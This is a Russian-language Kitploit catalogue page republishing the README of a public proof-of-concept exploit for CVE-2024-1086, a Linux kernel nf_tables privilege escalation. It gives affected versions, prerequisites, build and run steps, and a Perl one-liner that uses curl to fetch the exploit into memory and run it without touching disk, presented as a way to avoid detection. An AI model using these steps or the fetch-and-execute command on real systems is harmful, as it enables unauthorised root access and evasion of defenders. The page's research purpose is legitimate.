Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-1086 — Универсальный Proof-of-Concept эксплойт для локального повышения привилегий (CVE-2024-1086), работающий на большинстве ядер Linux версий от v5.14 до v6.6, включая Debian, Ubuntu и KernelCTF. Уровень успеха составляет 99.4% в образах KernelCTF. | Kitploit
Инструменты/GitHubGitHub/notselwyn/cve-2024-1086
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеСтатьи и ИсследованияОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubnotselwyn/cve-2024-1086

CVE-2024-1086

Универсальный Proof-of-Concept эксплойт для локального повышения привилегий (CVE-2024-1086), работающий на большинстве ядер Linux версий от v5.14 до v6.6, включая Debian, Ubuntu и KernelCTF. Уровень успеха составляет 99.4% в образах KernelCTF.

Репозиторий
2.5k33032 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2024-1086

Универсальный proof-of-concept эксплойт для локального повышения привилегий через CVE-2024-1086, работающий на большинстве ядер Linux с v5.14 по v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99.4% в образах KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

Статья в блоге / Разбор

Полный разбор эксплойта — включая справочную информацию и множество полезных диаграмм — можно найти в статье Flipping Pages.

Затронутые версии

Эксплойт затрагивает версии с v5.14 (включительно) по v6.6 (включительно), исключая пропатченные ветки v5.15.149>, v6.1.76>, v6.6.15>. Патчи для этих версий были выпущены в феврале 2024 года. Лежащая в основе уязвимость затрагивает все версии (исключая пропатченные стабильные ветки) с v3.15 по v6.8-rc1.

Ограничения:

  • Эксплойт не работает на ядрах v6.4> с параметром kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (включая Ubuntu v6.5)
  • Эксплойт требует пользовательских пространств имён (kconfig CONFIG_USER_NS=y), чтобы эти пользовательские пространства имён были непривилегированными (команда sh sysctl kernel.unprivileged_userns_clone = 1), и чтобы был включён nf_tables (kconfig CONFIG_NF_TABLES=y). По умолчанию всё это включено в Debian, Ubuntu и KernelCTF. Другие дистрибутивы не тестировались, но могут также работать. Кроме того, эксплойт тестировался только на x64/amd64.
  • Эксплойт может быть очень нестабильным на системах с высокой сетевой активностью
    • Системы с Wi-Fi адаптером, в окружении активно используемых Wi-Fi сетей, будут очень нестабильны.
    • На тестовых устройствах, пожалуйста, отключайте Wi-Fi адаптеры через BIOS.
  • Kernel panic (крах системы) после запуска эксплойта является побочным эффектом, который намеренно не был исправлен, чтобы предотвратить вредоносное использование эксплойта (т.е. попытки эксплуатации теперь должны быть более заметными и непрактичными в реальных операциях). Несмотря на это, он по-прежнему позволяет работать в лабораторных средах, так как root-оболочка функциональна, а сохранение через диск возможно.

Использование

Конфигурация

Значения по умолчанию должны работать из коробки на Debian, Ubuntu и KernelCTF с локальной оболочкой. На непротестированных конфигурациях/дистрибутивах, пожалуйста, убедитесь, что значения kconfig соответствуют целевому ядру. Их можно указать в src/config.h. Если вы запускаете эксплойт на машине с более чем 32GiB физической памяти, обязательно увеличьте CONFIG_PHYS_MEM. Если вы запускаете эксплойт через SSH (на тестовую машину) или reverse shell, вы можете переключить CONFIG_REDIRECT_LOG в 1, чтобы избежать лишней сетевой активности.

Сборка

Если это для вас непрактично, есть скомпилированный x64 бинарник с конфигурацией по умолчанию.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

Бинарник: CVE-2024-1086/exploit

Запуск

Запуск эксплойта так же прост:

root@kitploit:~
./exploit

Также поддерживается выполнение без сохранения файла на диск, на случай пентест-ситуаций, где необходимо избегать обнаружения. Однако на целевой системе должен быть установлен Perl:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Отказ от ответственности

Программы и скрипты («программы») в этом каталоге/папке/репозитории программного обеспечения («репозиторий») опубликованы, разработаны и распространяются только для образовательных/исследовательских целей. Я («создатель») не одобряю любое вредоносное или незаконное использование программ в этом репозитории, так как намерение состоит в том, чтобы делиться исследованиями, а не заниматься незаконной деятельностью с их помощью. Я не несу юридической ответственности за то, что вы делаете с программами в этом репозитории.

Скачать инструмент